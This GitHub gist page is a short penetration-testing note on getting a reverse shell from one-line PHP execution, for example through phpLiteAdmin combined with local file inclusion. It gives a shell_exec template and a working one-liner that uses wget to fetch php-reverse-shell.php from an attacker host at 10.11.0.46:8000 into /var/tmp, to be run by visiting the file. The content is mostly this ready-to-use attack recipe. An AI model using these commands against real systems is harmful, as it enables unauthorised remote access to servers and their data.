Skip to content

Instantly share code, notes, and snippets.

@jimmy-ly00
Created October 30, 2017 22:14
Show Gist options
  • Save jimmy-ly00/fb587bc102d66f1e41d84c4b4ea76fa3 to your computer and use it in GitHub Desktop.
Save jimmy-ly00/fb587bc102d66f1e41d84c4b4ea76fa3 to your computer and use it in GitHub Desktop.
One liner actual PHP code reverse shell
If you have access to executing php (and maybe LFI to visit the .php) e.g. phpLiteAdmin, but it only accepts one line so you cannot use the pentestmonkey php-reverse-shell.php
1. Use http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet in place of the one liner
<?php echo shell_exec("[INSERT ONE LINER");?>
2. Guess programs on machine and use LFI to visit file
<?php echo shell_exec("/usr/local/bin/wget http://10.11.0.46:8000/php-reverse-shell.php -O /var/tmp/shell.php 2>&1");?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment